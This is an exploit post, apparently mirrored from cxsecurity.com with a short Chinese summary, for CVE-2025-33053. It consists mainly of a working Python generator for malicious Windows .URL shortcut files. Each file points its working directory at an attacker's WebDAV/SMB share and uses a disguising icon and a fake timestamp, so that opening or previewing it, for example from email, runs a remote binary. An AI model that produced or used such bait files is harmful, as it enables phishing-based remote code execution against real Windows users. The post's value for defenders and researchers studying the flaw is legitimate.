该漏洞利用Windows .URL文件行为,在Windows 10/11中通过WebDAV或SMB路径远程执行代码。攻击者生成恶意.URL文件诱导受害者打开,系统自动连接远程路径执行任意代码。 2025-7-2 11:11:37 Author: cxsecurity.com(查看原文) 阅读量:38 收藏
WebDAV Windows 10 Remote Code Execution (RCE)
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE) Date: June 2025 Author: Dev Bui Hieu Tested on: Windows 10, Windows 11 Platform: Windows Type: Remote CVE: CVE-2025-33053 Description: This exploit leverages the behavior of Windows .URL files to execute a remote binary over a UNC path. When a victim opens or previews the .URL file (e.g. from email), the system may automatically reach out to the specified path (e.g. WebDAV or SMB share), leading to arbitrary code execution without prompt. ```bash python3 gen_url.py --ip 192.168.1.100 --out doc.url ``` import argparse def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified): content = f"""[InternetShortcut] URL={url_target} WorkingDirectory={working_directory} ShowCommand=7 IconIndex={icon_index} IconFile={icon_file} Modified={modified} """ with open(output_file, "w", encoding="utf-8") as f: f.write(content) print(f"[+] .url file created: {output_file}") def main(): parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)") parser.add_argument('--out', default="bait.url", help="Output .url file name") parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path") parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)") parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe", help="Target executable path on victim machine") parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", help="Icon file path") parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)") parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)") args = parser.parse_args() working_directory = fr"\\{args.ip}\{args.share}\\" generate_url_file( output_file=args.out, url_target=args.exe, working_directory=working_directory, icon_file=args.icon, icon_index=args.index, modified=args.modified ) if __name__ == "__main__": main()
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh